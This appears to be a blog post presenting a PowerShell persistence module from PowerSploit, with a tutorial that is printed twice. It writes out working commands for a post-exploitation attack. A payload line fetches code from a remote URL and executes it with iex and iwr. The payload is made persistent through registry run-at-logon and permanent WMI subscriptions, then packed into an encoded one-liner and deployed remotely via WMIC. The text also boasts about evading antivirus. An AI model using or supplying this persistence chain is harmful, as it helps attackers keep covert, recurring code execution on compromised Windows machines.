Download: Persistence Module
Generating a persistent script is relatively straightforward:
1) Drop the 'Persistence' folder into your module directory (usually $Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules) or just install the entire PowerSploit module.
2) Import the 'Persistence' module
Import-Module Persistence
3) Create your payload. This can come in the form of a scriptblock or a ps1 file. In this example, I'll be using a scriptblock consisting of a rickroll payload. ;D
$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
4) Specify the desired limited-user persistence options:
$UserOptions = New-UserPersistenceOptions -Registry -AtLogon
5) Specify the desired elevated persistence options:
$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'
6) Apply the persistence options to the rockroll payload. A persistence and removal script will be generated:
Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose
6a) Optionally, create a one-liner out of the generated persistence script (requires the full PowerSploit module):
Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose |
Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
7) The generated script will look like this:
8) Deploy the payload. In my example, I will execute the persistent payload remotely using WMIC and the encoded one-liner I generated:
9) The payload has now persisted on the target machine. Sit back and let the hilarity ensue.
As I've preached continuously, PowerShell is the ideal post-exploitation tool in a Windows environment. A PowerShell-based payload can accomplish the same tasks of any compiled payload all without fear of flagging anti-virus. Unfortunately, PowerShell offers no built in method of persisting your payloads. PowerShell v3 introduced a scheduled tasks module but obviously, this only works with v3 and you're out of luck if you want to persist via any other method.
I developed a persistence module for PowerShell that solves the challenges of persisting scripts once and for all. The module adds persistence capabilities to any PowerShell script. Upon persisting, the script will strip out its persistence logic.
Generating a persistent script is relatively straightforward:
1) Drop the 'Persistence' folder into your module directory (usually $Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules) or just install the entire PowerSploit module.
2) Import the 'Persistence' module
Import-Module Persistence
3) Create your payload. This can come in the form of a scriptblock or a ps1 file. In this example, I'll be using a scriptblock consisting of a rickroll payload. ;D
$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
4) Specify the desired limited-user persistence options:
$UserOptions = New-UserPersistenceOptions -Registry -AtLogon
5) Specify the desired elevated persistence options:
$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'
6) Apply the persistence options to the rockroll payload. A persistence and removal script will be generated:
Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose
6a) Optionally, create a one-liner out of the generated persistence script (requires the full PowerSploit module):
Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose |
Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
7) The generated script will look like this:
8) Deploy the payload. In my example, I will execute the persistent payload remotely using WMIC and the encoded one-liner I generated:
9) The payload has now persisted on the target machine. Sit back and let the hilarity ensue.